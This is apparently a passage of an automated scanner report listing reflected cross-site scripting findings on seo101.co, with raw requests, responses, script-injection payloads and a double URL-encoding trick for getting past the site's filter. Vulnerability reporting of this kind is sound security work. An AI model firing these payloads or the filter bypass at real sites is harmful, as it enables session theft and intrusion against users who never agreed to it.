User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css7cbc2\"><script>alert(1)</script>0b7ff5a2d05/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c04b"><script>alert(1)</script>825682d9e69 was submitted in the REST URL parameter 4. This input was echoed as 8c04b\"><script>alert(1)</script>825682d9e69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css8c04b"><script>alert(1)</script>825682d9e69 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css/default.css8c04b\"><script>alert(1)</script>825682d9e69 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce8fc%253balert%25281%2529%252f%252f374e2009f0a was submitted in the REST URL parameter 4. This input was echoed as ce8fc;alert(1)//374e2009f0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.cssce8fc%253balert%25281%2529%252f%252f374e2009f0a HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css/default.cssce8fc;alert(1)//374e2009f0a SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40d2f</script><script>alert(1)</script>bb4f5014ef6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C40d2f</script><script>alert(1)</script>bb4f5014ef6/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fcc91><script>alert(1)</script>be03c1556d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cfcc91><script>alert(1)</script>be03c1556d9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a5c4"><script>alert(1)</script>a2ee812211f was submitted in the REST URL parameter 1. This input was echoed as 6a5c4\"><script>alert(1)</script>a2ee812211f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C6a5c4"><script>alert(1)</script>a2ee812211f/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5094"><script>alert(1)</script>a62e3e17745 was submitted in the REST URL parameter 2. This input was echoed as c5094\"><script>alert(1)</script>a62e3e17745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc5094"><script>alert(1)</script>a62e3e17745/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<c5094\"><script>alert(1)</script>a62e3e17745/img/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce0e4%253balert%25281%2529%252f%252f0b5546c25c5 was submitted in the REST URL parameter 2. This input was echoed as ce0e4;alert(1)//0b5546c25c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cce0e4%253balert%25281%2529%252f%252f0b5546c25c5/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<ce0e4;alert(1)//0b5546c25c5/img/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 501d0><script>alert(1)</script>f7e32a34d92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80276%253balert%25281%2529%252f%252f05cde4b08ac was submitted in the REST URL parameter 3. This input was echoed as 80276;alert(1)//05cde4b08ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img80276%253balert%25281%2529%252f%252f05cde4b08ac/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img80276;alert(1)//05cde4b08ac/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406b8"><script>alert(1)</script>e23795f9a69 was submitted in the REST URL parameter 3. This input was echoed as 406b8\"><script>alert(1)</script>e23795f9a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img406b8"><script>alert(1)</script>e23795f9a69/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img406b8\"><script>alert(1)</script>e23795f9a69/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5070e%253balert%25281%2529%252f%252fc119c4d5a26 was submitted in the REST URL parameter 4. This input was echoed as 5070e;alert(1)//c119c4d5a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico5070e%253balert%25281%2529%252f%252fc119c4d5a26 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/favicon.ico5070e;alert(1)//c119c4d5a26 SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca7d"><script>alert(1)</script>956f69a5f0b was submitted in the REST URL parameter 4. This input was echoed as 6ca7d\"><script>alert(1)</script>956f69a5f0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico6ca7d"><script>alert(1)</script>956f69a5f0b HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/favicon.ico6ca7d\"><script>alert(1)</script>956f69a5f0b seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3df0</script><script>alert(1)</script>2e02c98ebbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cd3df0</script><script>alert(1)</script>2e02c98ebbf/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload e7ba4><script>alert(1)</script>dd61f70d1b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce7ba4><script>alert(1)</script>dd61f70d1b3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba38e"><script>alert(1)</script>441ae489a28 was submitted in the REST URL parameter 1. This input was echoed as ba38e\"><script>alert(1)</script>441ae489a28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cba38e"><script>alert(1)</script>441ae489a28/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bccd2%253balert%25281%2529%252f%252fa9a7bca570b was submitted in the REST URL parameter 2. This input was echoed as bccd2;alert(1)//a9a7bca570b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbccd2%253balert%25281%2529%252f%252fa9a7bca570b/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<bccd2;alert(1)//a9a7bca570b/img/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 952dc><script>alert(1)</script>1dd53549d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/952dc><script>alert(1)</script>1dd53549d4e/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</952dc><script>alert(1)</script>1dd53549d4e/img/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66dd"><script>alert(1)</script>e7def84f653 was submitted in the REST URL parameter 2. This input was echoed as e66dd\"><script>alert(1)</script>e7def84f653 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Ce66dd"><script>alert(1)</script>e7def84f653/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<e66dd\"><script>alert(1)</script>e7def84f653/img/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc52"><script>alert(1)</script>c6e04e7bc63 was submitted in the REST URL parameter 3. This input was echoed as afc52\"><script>alert(1)</script>c6e04e7bc63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgafc52"><script>alert(1)</script>c6e04e7bc63/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgafc52\"><script>alert(1)</script>c6e04e7bc63/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4d89d%253balert%25281%2529%252f%252f9276cd50de3 was submitted in the REST URL parameter 3. This input was echoed as 4d89d;alert(1)//9276cd50de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img4d89d%253balert%25281%2529%252f%252f9276cd50de3/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img4d89d;alert(1)//9276cd50de3/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a292"><script>alert(1)</script>8961f3fc872 was submitted in the REST URL parameter 4. This input was echoed as 9a292\"><script>alert(1)</script>8961f3fc872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png9a292"><script>alert(1)</script>8961f3fc872 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/logo.png9a292\"><script>alert(1)</script>8961f3fc872 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15079%253balert%25281%2529%252f%252ff90119d5a01 was submitted in the REST URL parameter 4. This input was echoed as 15079;alert(1)//f90119d5a01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
